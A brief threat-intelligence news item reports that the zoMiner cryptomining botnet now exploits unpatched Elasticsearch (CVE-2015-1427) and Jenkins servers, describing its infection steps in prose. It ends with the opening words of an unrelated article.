After being discovered in November 2020, the zoMiner botnet has shifted directions to target vulnerable versions of Elasticsearch and Jenkins servers. According to Qihoo 360’s Network Security Research Lab, the botnet is scanning for unpatched versions of Elasticsearch and Jenkins in an attempt to exploit CVE-2015-1427 for Elasticsearch and an unmentioned CVE for Jenkins. The exploit will attempt to download and execute a shell script listed as a txt file. Once the shell script is launched, zoMiner will attempt to terminate any competing miners on the host, set up persistence via cron, and start the miner. Currently zoMiner has amassed over $4,500 USD worth of cryptocurrency.
By Anthony Zampino Introduction Leading up to the most recent Russian invasion of Ukraine in